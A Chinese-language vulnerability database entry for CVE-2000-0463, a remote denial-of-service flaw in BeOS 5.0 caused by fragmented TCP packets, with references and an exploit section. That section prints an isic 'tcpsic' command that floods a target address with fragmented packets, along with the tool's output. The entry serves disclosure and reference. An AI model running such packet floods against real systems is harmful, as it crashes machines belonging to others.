BeOS TCP碎片远程DoS漏洞

BeOS TCP碎片远程DoS漏洞

漏洞ID 1105847 漏洞类型 未知
发布时间 2000-05-18 更新时间 2005-05-02
图片[1]-BeOS TCP碎片远程DoS漏洞-安全小百科CVE编号 CVE-2000-0463
图片[2]-BeOS TCP碎片远程DoS漏洞-安全小百科CNNVD-ID CNNVD-200005-070
漏洞平台 BeOS CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19938
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-070
|漏洞详情
BeOS5.0版本存在漏洞。远程攻击者借助破碎的TCP包导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1222/info

BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot. 

[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%

1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 packets in 2.74s @ 1824.48 pkts/s
|参考资料

来源:BID
名称:1222
链接:http://www.securityfocus.com/bid/1222
来源:BUGTRAQ
名称:20000517AUXSecurityAdvisoryonBe/OS5.0(DoS)
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0197.html

相关推荐: DUware Software Multiple Vulnerabilities

DUware Software Multiple Vulnerabilities 漏洞ID 1098981 漏洞类型 Access Validation Error 发布时间 2004-01-20 更新时间 2004-01-20 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享